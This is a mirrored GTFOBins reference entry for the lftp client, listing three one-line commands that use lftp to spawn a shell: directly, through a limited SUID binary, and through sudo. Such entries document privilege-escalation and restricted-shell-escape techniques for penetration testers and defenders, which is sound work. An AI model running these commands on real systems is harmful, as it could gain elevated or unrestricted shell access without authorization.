mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-02-07 02:53:32 +01:00
10 lines
152 B
Markdown
10 lines
152 B
Markdown
---
|
|
functions:
|
|
shell:
|
|
- code: lftp -c '!/bin/sh'
|
|
limited-suid:
|
|
- code: ./lftp -c '!/bin/sh'
|
|
sudo:
|
|
- code: sudo lftp -c '!/bin/sh'
|
|
---
|